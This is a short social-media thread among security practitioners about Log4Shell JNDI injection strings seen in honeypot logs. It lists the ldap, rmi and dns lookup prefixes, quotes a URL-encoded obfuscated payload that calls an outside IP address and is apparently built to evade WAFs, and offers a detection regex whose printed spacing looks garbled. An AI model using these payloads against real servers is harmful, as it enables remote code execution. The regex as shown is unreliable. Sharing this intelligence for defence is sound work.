Follow

${jndi:ldap://

${jndi:rmi://

${jndi:dns://

Another other protocol being actively used that I am missing? At least, only seeing those 3 on our honeypot logs:

reputation.noc.org/jndi-attack

Also some interesting obfuscation, I am assuming to bypass WAF and IDSs:

/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2F

@dcid On your last bit, I've got fairly good info that every possible permutation of that is coverable by the big three cloud providers at the L7 level, and that they're all exchanging test suites and prepping autoblocks already.

@dcid This regex should cover all the permutations:

\ $ { ( \ $ { ( . * ? : | . * ? : . * ? : – ) ( ‘ | ” | ` ) * ( ? 1 ) } * | [jndi:lapsrm] ( ‘ | ” | ` ) * } * ) { 9 , 1 1 }

Sign in to participate in the conversation
Noc.Social

Open Source Social Network. Focused on technology, networking, linux, privacy and security, but open to anyone. Civil discourse, polite and open. Managed by the noc.org team.